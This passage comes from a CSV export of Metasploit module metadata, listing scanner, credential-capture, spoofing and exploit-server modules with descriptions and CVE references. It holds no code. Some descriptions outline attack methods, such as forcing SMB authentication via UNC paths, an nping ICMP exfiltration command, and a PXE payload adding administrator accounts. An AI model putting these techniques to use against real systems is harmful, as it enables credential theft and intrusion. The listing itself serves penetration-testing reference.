Framework License (BSD)","f","2011-12-12 00:00:00",,,"aggressive","t","BID-50890, EDB-18189, OSVDB-77455, URL-http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt","Prabhu S Angadi, juan vazquez , sinn3r " 1725,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/tftp/netdecision_tftp.rb","auxiliary","scanner/tftp/netdecision_tftp","auxiliary/scanner/tftp/netdecision_tftp","NetDecision 4.2 TFTP Directory Traversal",300,"This modules exploits a directory traversal vulnerability in NetDecision 4.2 TFTP service.","Metasploit Framework License (BSD)","f","2009-05-16 00:00:00",,,"aggressive","t","BID-35002, CVE-2009-1730, OSVDB-54607","Rob Kraus, juan vazquez " 1726,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/tftp/tftpbrute.rb","auxiliary","scanner/tftp/tftpbrute","auxiliary/scanner/tftp/tftpbrute","TFTP Brute Forcer",300,"This module uses a dictionary to brute force valid TFTP image names from a TFTP server.","BSD License","f",,,,"aggressive","t",,"antoine" 1727,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/upnp/ssdp_msearch.rb","auxiliary","scanner/upnp/ssdp_msearch","auxiliary/scanner/upnp/ssdp_msearch","UPnP SSDP M-SEARCH Information Discovery",300,"Discover information from UPnP-enabled systems","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , todb " 1728,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/esx_fingerprint.rb","auxiliary","scanner/vmware/esx_fingerprint","auxiliary/scanner/vmware/esx_fingerprint","VMWare ESX/ESXi Fingerprint Scanner",300,"This module accesses the web API interfaces for VMware ESX/ESXi servers and attempts to identify version information for that server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1729,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmauthd_login.rb","auxiliary","scanner/vmware/vmauthd_login","auxiliary/scanner/vmware/vmauthd_login","VMWare Authentication Daemon Login Scanner",300,"This module will test vmauthd logins on a range of machines and report successful logins.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","theLightCosine " 1730,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmauthd_version.rb","auxiliary","scanner/vmware/vmauthd_version","auxiliary/scanner/vmware/vmauthd_version","VMWare Authentication Daemon Version Scanner",300,"This module will identify information about a host through the vmauthd service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , theLightCosine " 1731,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb","auxiliary","scanner/vmware/vmware_enum_permissions","auxiliary/scanner/vmware/vmware_enum_permissions","VMWare Enumerate Permissions",300,"This module will log into the Web API of VMWare and try to enumerate all the user/group permissions. Unlike enum suers this is only users and groups that specifically have permissions defined within the VMware product","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1732,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb","auxiliary","scanner/vmware/vmware_enum_sessions","auxiliary/scanner/vmware/vmware_enum_sessions","VMWare Enumerate Active Sessions",300,"This module will log into the Web API of VMWare and try to enumerate all the login sessions.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1733,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmware_enum_users.rb","auxiliary","scanner/vmware/vmware_enum_users","auxiliary/scanner/vmware/vmware_enum_users","VMWare Enumerate User Accounts",300,"This module will log into the Web API of VMWare and try to enumerate all the user accounts. If the VMware instance is connected to one or more domains, it will try to enumerate domain users as well.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1734,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb","auxiliary","scanner/vmware/vmware_enum_vms","auxiliary/scanner/vmware/vmware_enum_vms","VMWare Enumerate Virtual Machines",300,"This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1735,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmware_host_details.rb","auxiliary","scanner/vmware/vmware_host_details","auxiliary/scanner/vmware/vmware_host_details","VMWare Enumerate Host Details",300,"This module attempts to enumerate information about the host systems through the VMWare web API. This can include information about the hardware installed on the host machine.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1736,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmware_http_login.rb","auxiliary","scanner/vmware/vmware_http_login","auxiliary/scanner/vmware/vmware_http_login","VMWare Web Login Scanner",300,"This module attempts to authenticate to the VMWare HTTP service for VmWare Server, ESX, and ESXI","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","theLightCosine " 1737,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb","auxiliary","scanner/vmware/vmware_screenshot_stealer","auxiliary/scanner/vmware/vmware_screenshot_stealer","VMWare Screenshot Stealer",300,"This module uses supplied login credentials to connect to VMWare via the web interface. It then searches through the datastores looking for screenshots. It will downlaod any screenshots it finds and save them as loot.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1738,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vnc/vnc_login.rb","auxiliary","scanner/vnc/vnc_login","auxiliary/scanner/vnc/vnc_login","VNC Authentication Scanner",300,"This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, and 3.8 using the VNC challenge response authentication method.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0506","carstein , jduck " 1739,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vnc/vnc_none_auth.rb","auxiliary","scanner/vnc/vnc_none_auth","auxiliary/scanner/vnc/vnc_none_auth","VNC Authentication None Detection",300,"Detect VNC servers that support the ""None"" authentication method.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/RFB, URL-http://en.wikipedia.org/wiki/Vnc","Matteo Cantoni , jduck " 1740,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/voice/recorder.rb","auxiliary","scanner/voice/recorder","auxiliary/scanner/voice/recorder","Telephone Line Voice Scanner",300,"This module dials a range of phone numbers and records audio from each answered call","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1741,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb","auxiliary","scanner/vxworks/wdbrpc_bootline","auxiliary/scanner/vxworks/wdbrpc_bootline","VxWorks WDB Agent Boot Parameter Scanner",300,"Scan for exposed VxWorks wdbrpc daemons and dump the boot parameters from memory","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html, US-CERT-VU-362332","hdm " 1742,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb","auxiliary","scanner/vxworks/wdbrpc_version","auxiliary/scanner/vxworks/wdbrpc_version","VxWorks WDB Agent Version Scanner",300,"Scan for exposed VxWorks wdbrpc daemons","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html, US-CERT-VU-362332","hdm " 1743,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb","auxiliary","scanner/winrm/winrm_auth_methods","auxiliary/scanner/winrm/winrm_auth_methods","WinRM Authentication Method Detection",300,"This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service. If it is a WinRM service, it also gathers the Authentication Methods supported.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"thelightcosine" 1744,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/winrm/winrm_cmd.rb","auxiliary","scanner/winrm/winrm_cmd","auxiliary/scanner/winrm/winrm_cmd","WinRM Command Runner",300,"This module runs arbitrary Windows commands using the WinRM Service","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"thelightcosine" 1745,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/winrm/winrm_login.rb","auxiliary","scanner/winrm/winrm_login","auxiliary/scanner/winrm/winrm_login","WinRM Login Utility",300,"This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate(NTLM) authentication. Kerberos is not currently supported. Please note: in order to use this module without SSL, the 'AllowUnencrypted' winrm option must be set. Otherwise adjust the port and set the SSL options in the module as appropriate.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","thelightcosine" 1746,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/winrm/winrm_wql.rb","auxiliary","scanner/winrm/winrm_wql","auxiliary/scanner/winrm/winrm_wql","WinRM WQL Query Runner",300,"This module runs WQL queries against remote WinRM Services. Authentication is required. Currently only works with NTLM auth. Please note in order to use this module, the 'AllowUnencrypted' winrm option must be set.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"thelightcosine" 1747,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/x11/open_x11.rb","auxiliary","scanner/x11/open_x11","auxiliary/scanner/x11/open_x11","X11 No-Auth Scanner",300,"This module scans for X11 servers that allow anyone to connect without authentication.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0526, OSVDB-309","tebo " 1748,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/browser_autopwn.rb","auxiliary","server/browser_autopwn","auxiliary/server/browser_autopwn","HTTP Client Automatic Exploiter",300,"This module has three actions. The first (and the default) is 'WebServer' which uses a combination of client-side and server-side techniques to fingerprint HTTP clients and then automatically exploit them. Next is 'DefangedDetection' which does only the fingerprinting part. Lastly, 'list' simply prints the names of all exploit modules that would be used by the WebServer action given the current MATCH and EXCLUDE options. Also adds a 'list' command which is the same as running with ACTION=list.","BSD License","f",,,"WebServer","passive","t",,"egypt " 1749,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/drda.rb","auxiliary","server/capture/drda","auxiliary/server/capture/drda","Authentication Capture: DRDA (DB2, Informix, Derby)",300,"This module provides a fake DRDA (DB2, Informix, Derby) server that is designed to capture authentication credentials.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"Patrik Karlsson " 1750,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/ftp.rb","auxiliary","server/capture/ftp","auxiliary/server/capture/ftp","Authentication Capture: FTP",300,"This module provides a fake FTP service that is designed to capture authentication credentials.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"ddz , hdm " 1751,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/http.rb","auxiliary","server/capture/http","auxiliary/server/capture/http","Authentication Capture: HTTP",300,"This module provides a fake HTTP service that is designed to capture authentication credentials.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"ddz , hdm " 1752,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/http_basic.rb","auxiliary","server/capture/http_basic","auxiliary/server/capture/http_basic","HTTP Client Basic Authentication Credential Collector",300,"This module responds to all requests for resources with a HTTP 401. This should cause most browsers to prompt for a credential. If the user enters Basic Auth creds they are sent to the console. This may be helpful in some phishing expeditions where it is possible to embed a resource into a page. This attack is discussed in Chapter 3 of The Tangled Web by Michal Zalewski.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"saint patrick " 1753,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/http_javascript_keylogger.rb","auxiliary","server/capture/http_javascript_keylogger","auxiliary/server/capture/http_javascript_keylogger","Capture: HTTP JavaScript Keylogger",300,"This modules runs a web server that demonstrates keystroke logging through JavaScript. The DEMO option can be set to enable a page that demonstrates this technique. Future improvements will allow for a configurable template to be used with this module. To use this module with an existing web page, simply add a script source tag pointing to the URL of this service ending in the .js extension. For example, if URIPATH is set to ""test"", the following URL will load this script into the calling site: http://server:port/test/anything.js","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Marcus J. Carey , hdm " 1754,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/http_ntlm.rb","auxiliary","server/capture/http_ntlm","auxiliary/server/capture/http_ntlm","HTTP Client MS Credential Catcher",300,"This module attempts to quietly catch NTLM/LM Challenge hashes.","Metasploit Framework License (BSD)","f",,,"WebServer","passive","t",,"Ryan Linn " 1755,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/imap.rb","auxiliary","server/capture/imap","auxiliary/server/capture/imap","Authentication Capture: IMAP",300,"This module provides a fake IMAP service that is designed to capture authentication credentials.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"ddz , hdm " 1756,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/mssql.rb","auxiliary","server/capture/mssql","auxiliary/server/capture/mssql","Authentication Capture: MSSQL",300,"This module provides a fake MSSQL service that is designed to capture authentication credentials. The modules supports both the weak encoded database logins as well as Windows logins (NTLM).","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"Patrik Karlsson " 1757,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/mysql.rb","auxiliary","server/capture/mysql","auxiliary/server/capture/mysql","Authentication Capture: MySQL",300,"This module provides a fake MySQL service that is designed to capture authentication credentials. It captures challenge and response pairs that can be supplied to Cain or JtR for cracking.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"Patrik Karlsson " 1758,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/pop3.rb","auxiliary","server/capture/pop3","auxiliary/server/capture/pop3","Authentication Capture: POP3",300,"This module provides a fake POP3 service that is designed to capture authentication credentials.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"ddz , hdm " 1759,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/postgresql.rb","auxiliary","server/capture/postgresql","auxiliary/server/capture/postgresql","Authentication Capture: PostgreSQL",300,"This module provides a fake PostgreSQL service that is designed to capture clear-text authentication credentials.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"Dhiru Kholia " 1760,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/printjob_capture.rb","auxiliary","server/capture/printjob_capture","auxiliary/server/capture/printjob_capture","Printjob Capture Service",300,"This module is designed to listen for PJL or PostScript print jobs. Once a print job is detected it is saved to loot. The captured printjob can then be forwarded on to another printer (required for LPR printjobs). Resulting PCL/PS files can be read with GhostScript/GhostPCL. Note, this module does not yet support IPP connections.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t","URL-http://blog.c22.cc/toolsscripts/prn-2-me/, URL-http://www.ghostscript.com","Chris John Riley, todb " 1761,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/sip.rb","auxiliary","server/capture/sip","auxiliary/server/capture/sip","Authentication Capture: SIP",300,"This module provides a fake SIP service that is designed to capture authentication credentials. It captures challenge and response pairs that can be supplied to Cain or JtR for cracking.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"Patrik Karlsson " 1762,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/smb.rb","auxiliary","server/capture/smb","auxiliary/server/capture/smb","Authentication Capture: SMB",300,"This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.","Metasploit Framework License (BSD)","f",,,"Sniffer","passive","t",,"hdm " 1763,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/smtp.rb","auxiliary","server/capture/smtp","auxiliary/server/capture/smtp","Authentication Capture: SMTP",300,"This module provides a fake SMTP service that is designed to capture authentication credentials.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"ddz , hdm " 1764,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/telnet.rb","auxiliary","server/capture/telnet","auxiliary/server/capture/telnet","Authentication Capture: Telnet",300,"This module provides a fake Telnet service that is designed to capture authentication credentials. DONTs and WONTs are sent to the client for all option negotiations, except for ECHO at the time of the password prompt since the server controls that for a bit more realism.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"kris katterjohn " 1765,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/vnc.rb","auxiliary","server/capture/vnc","auxiliary/server/capture/vnc","Authentication Capture: VNC",300,"This module provides a fake VNC service that is designed to capture authentication credentials.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"Patrik Karlsson " 1766,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/dhcp.rb","auxiliary","server/dhcp","auxiliary/server/dhcp","DHCP Server",300,"This module provides a DHCP service","Metasploit Framework License (BSD)","f",,,"Service","passive","t",,"apconole , scriptjunkie" 1767,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/dns/spoofhelper.rb","auxiliary","server/dns/spoofhelper","auxiliary/server/dns/spoofhelper","DNS Spoofing Helper Service",300,"This module provides a DNS service that returns TXT records indicating information about the querying service. Based on Dino Dai Zovi DNS code from Karma.","Metasploit Framework License (BSD)","f",,,"Service","passive","t",,"ddz , hdm " 1768,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/fakedns.rb","auxiliary","server/fakedns","auxiliary/server/fakedns","Fake DNS Service",300,"This module provides a DNS service that redirects all queries to a particular address.","Metasploit Framework License (BSD)","f",,,"Service","passive","t",,"ddz , hdm " 1769,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/ftp.rb","auxiliary","server/ftp","auxiliary/server/ftp","FTP File Server",300,"This module provides a FTP service","Metasploit Framework License (BSD)","f",,,"Service","passive","t",,"hdm " 1770,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/http_ntlmrelay.rb","auxiliary","server/http_ntlmrelay","auxiliary/server/http_ntlmrelay","HTTP Client MS Credential Relayer",300,"This module relays negotiated NTLM Credentials from an HTTP server to multiple protocols. Currently, this module supports relaying to SMB and HTTP. Complicated custom attacks requiring multiple requests that depend on each other can be written using the SYNC* options. For example, a CSRF-style attack might first set an HTTP_GET request with a unique SNYNCID and set an HTTP_POST request with a SYNCFILE, which contains logic to look through the database and parse out important values, such as the CSRF token or authentication cookies, setting these as configuration options, and finally create a web page with iframe elements pointing at the HTTP_GET and HTTP_POSTs.","Metasploit Framework License (BSD)","f",,,"WebServer","passive","t",,"Rich Lundeen " 1771,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/icmp_exfil.rb","auxiliary","server/icmp_exfil","auxiliary/server/icmp_exfil","ICMP Exfiltration Service",300,"This module is designed to provide a server-side component to receive and store files exfiltrated over ICMP echo request packets. To use this module you will need to send an initial ICMP echo request containing the specific start trigger (defaults to '^BOF') this can be followed by the filename being sent (or a random filename can be assisnged). All data received from this source will automatically be added to the receive buffer until an ICMP echo request containing a specific end trigger (defaults to '^EOL') is received. Suggested Client: Data can be sent from the client using a variety of tools. One such example is nping (included with the NMAP suite of tools) - usage: nping --icmp 10.0.0.1 --data-string ""BOFtest.txt"" -c1","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc/2012/02/17/quick-post-fun-with-python-ctypes-simpleicmp/, URL-http://nmap.org/book/nping-man.html, URL-https://github.com/todb/packetfu","Chris John Riley" 1772,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/pxexploit.rb","auxiliary","server/pxexploit","auxiliary/server/pxexploit","PXE Boot Exploit Server",300,"This module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that reads the hard drive; placing a payload to install metsvc, disable the firewall, and add a new user metasploit on any Windows partition seen, and add a uid 0 user with username and password metasploit to any linux partition seen. The windows user will have the password p@SSw0rd!123456 (in case of complexity requirements) and will be added to the administrators group. Note: the displayed IP address of a target is the address this DHCP server handed out, not the ""normal"" IP address the host uses.","Metasploit Framework License (BSD)","f",,,"Service","passive","t",,"scriptjunkie" 1773,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/socks4a.rb","auxiliary","server/socks4a","auxiliary/server/socks4a","Socks4a Proxy Server",300,"This module provides a socks4a proxy server that uses the builtin Metasploit routing to relay connections.","Metasploit Framework License (BSD)","f",,,"Proxy","passive","t",,"sf " 1774,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/socks_unc.rb","auxiliary","server/socks_unc","auxiliary/server/socks_unc","SOCKS Proxy UNC Path Redirection",300,"This module provides a Socks proxy service that redirects all HTTP requests to a web page that loads a UNC path.","Metasploit Framework License (BSD)","f",,,"Proxy","passive","t",,"hdm " 1775,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/tftp.rb","auxiliary","server/tftp","auxiliary/server/tftp","TFTP File Server",300,"This module provides a TFTP service","Metasploit Framework License (BSD)","f",,,"Service","passive","t",,"jduck " 1776,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/webkit_xslt_dropper.rb","auxiliary","server/webkit_xslt_dropper","auxiliary/server/webkit_xslt_dropper","Cross Platform Webkit File Dropper",300,"This module exploits a XSLT vulnerability in Webkit to drop ASCII or UTF-8 files to the target file-system. By default, the file will be dropped in C:\Program Files\","Metasploit Framework License (BSD)","f",,,"WebServer","passive","t",,"Nicolas Gregoire" 1777,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/wpad.rb","auxiliary","server/wpad","auxiliary/server/wpad","WPAD.dat File Server",300,"This module generates a valid wpad.dat file for WPAD mitm attacks. Usually this module is used in combination with DNS attacks or the 'NetBIOS Name Service Spoofer' module. Please remember as the server will be running by default on TCP port 80 you will need the required privileges to open that port.","Metasploit Framework License (BSD)","f",,,,"passive","t",,"et " 1778,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sniffer/psnuffle.rb","auxiliary","sniffer/psnuffle","auxiliary/sniffer/psnuffle","pSnuffle Packet Sniffer",300,"This module sniffs passwords like dsniff did in the past","Metasploit Framework License (BSD)","f",,,"Sniffer","passive","t",,"Max Moser " 1779,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/arp/arp_poisoning.rb","auxiliary","spoof/arp/arp_poisoning","auxiliary/spoof/arp/arp_poisoning","ARP Spoof",300,"Spoof ARP replies and poison remote ARP caches to conduct IP address spoofing or a denial of service.","Metasploit Framework License (BSD)","f","1999-12-22 00:00:00",,,"aggressive","t","CVE-1999-0667, OSVDB-11169, URL-http://en.wikipedia.org/wiki/ARP_spoofing","amaloteaux " 1780,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/cisco/dtp.rb","auxiliary","spoof/cisco/dtp","auxiliary/spoof/cisco/dtp","Forge Cisco DTP Packets",300,"This module forges DTP packets to initialize a trunk port.","Metasploit Framework License (BSD)","f",,,"Service","passive","t",,"Spencer McIntyre" 1781,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/dns/bailiwicked_domain.rb","auxiliary","spoof/dns/bailiwicked_domain","auxiliary/spoof/dns/bailiwicked_domain","DNS BailiWicked Domain Attack",300,"This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target domains nameserver entries in a vulnerable DNS cache server. This attack works by sending random hostname queries to the target DNS server coupled with spoofed replies to those queries from the authoritative nameservers for that domain. Eventually, a guessed ID will match, the spoofed packet will get accepted, and the nameserver entries for the target domain will be replaced by the server specified in the NEWDNS option of this exploit.","Metasploit Framework License (BSD)","f","2008-07-21 00:00:00",,,"aggressive","t","CVE-2008-1447, OSVDB-46776, URL-http://www.caughq.org/exploits/CAU-EX-2008-0003.txt, US-CERT-VU-800113","Cedric Blancher , I)ruid , hdm " 1782,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/dns/bailiwicked_host.rb","auxiliary","spoof/dns/bailiwicked_host","auxiliary/spoof/dns/bailiwicked_host","DNS BailiWicked Host Attack",300,"This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single malicious host entry into the target nameserver by sending random hostname queries to the target DNS server coupled with spoofed replies to those queries from the authoritative nameservers for that domain. Eventually, a guessed ID will match, the spoofed packet will get accepted, and due to the additional hostname entry being within bailiwick constraints of the original request the malicious host entry will get cached.","Metasploit Framework License (BSD)","f","2008-07-21 00:00:00",,,"aggressive","t","CVE-2008-1447, OSVDB-46776, URL-http://www.caughq.org/exploits/CAU-EX-2008-0002.txt, US-CERT-VU-800113","I)ruid , hdm " 1783,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/dns/compare_results.rb","auxiliary","spoof/dns/compare_results","auxiliary/spoof/dns/compare_results","DNS Lookup Result Comparison",300,"This module can be used to determine differences in the cache entries between two DNS servers. This is primarily useful for detecting cache poisoning attacks, but can also be used to detect geo-location loadbalancing.","Metasploit Framework License (BSD)","f","2008-07-21 00:00:00",,,"aggressive","t",,"hdm " 1784,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/llmnr/llmnr_response.rb","auxiliary","spoof/llmnr/llmnr_response","auxiliary/spoof/llmnr/llmnr_response","LLMNR Spoofer",300,"LLMNR (Link-local Multicast Name Resolution) is the successor of NetBIOS (Windows Vista and up) and is used to resolve the names of neighboring computers. This module forges LLMNR responses by listening for LLMNR requests sent to the LLMNR multicast address (224.0.0.252) and responding with a user-defined spoofed IP address.","Metasploit Framework License (BSD)","f",,,"Service","passive","t","URL-http://www.ietf.org/rfc/rfc4795.txt","Robin Francois " 1785,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/nbns/nbns_response.rb","auxiliary","spoof/nbns/nbns_response","auxiliary/spoof/nbns/nbns_response","NetBIOS Name Service Spoofer",300,"This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet's broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker's choosing. Combined with auxiliary/capture/server/smb or capture/server/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to tcp/137 on all interfaces.","Metasploit Framework License (BSD)","f",,,"Service","passive","t","URL-http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html","Tim Medin " 1786,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/replay/pcap_replay.rb","auxiliary","spoof/replay/pcap_replay","auxiliary/spoof/replay/pcap_replay","Pcap Replay Utility",300,"Replay a pcap capture file","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"amaloteaux " 1787,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/wifi/airpwn.rb","auxiliary","spoof/wifi/airpwn","auxiliary/spoof/wifi/airpwn","Airpwn TCP Hijack",300,"TCP streams are 'protected' only in so much as the sequence number is not guessable. Wifi is shared media. Got your nose. Responses which do not begin with Header: Value assumed to be HTML only and will have Header:Value data prepended. Responses which do not include a Content-Length header will have one generated.","Metasploit Framework License (BSD)","f",,,"Airpwn","aggressive","t",,"ddz , dragorn, hdm , toast" 1788,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/wifi/dnspwn.rb","auxiliary","spoof/wifi/dnspwn","auxiliary/spoof/wifi/dnspwn","DNSpwn DNS Hijack",300,"Race DNS responses and replace DNS queries","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"dragorn" 1789,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb","auxiliary","sqli/oracle/dbms_cdc_ipublish","auxiliary/sqli/oracle/dbms_cdc_ipublish","Oracle DB SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE",300,"The module exploits an sql 